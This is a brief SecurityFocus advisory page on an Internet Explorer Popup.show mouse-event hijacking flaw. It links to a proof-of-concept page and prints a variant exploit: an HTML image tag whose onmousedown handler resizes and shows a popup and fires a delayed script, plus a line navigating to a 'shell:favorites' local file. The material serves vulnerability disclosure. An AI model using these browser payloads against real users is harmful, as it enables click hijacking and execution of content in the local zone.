Microsoft Internet Explorer Popup.show Mouse Event Hijacking Vulnerability

A function proof-of-concept has been posted on the following page:

http://freehost07.websamba.com/greyhats/hijackclick3.htm

A variant of this proof of concept has been supplied by http-equiv:
Just substitute the following:
1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>

2. location="shell:favorites\\greyhat[1].htm"


 

Privacy Statement
Copyright 2010, SecurityFocus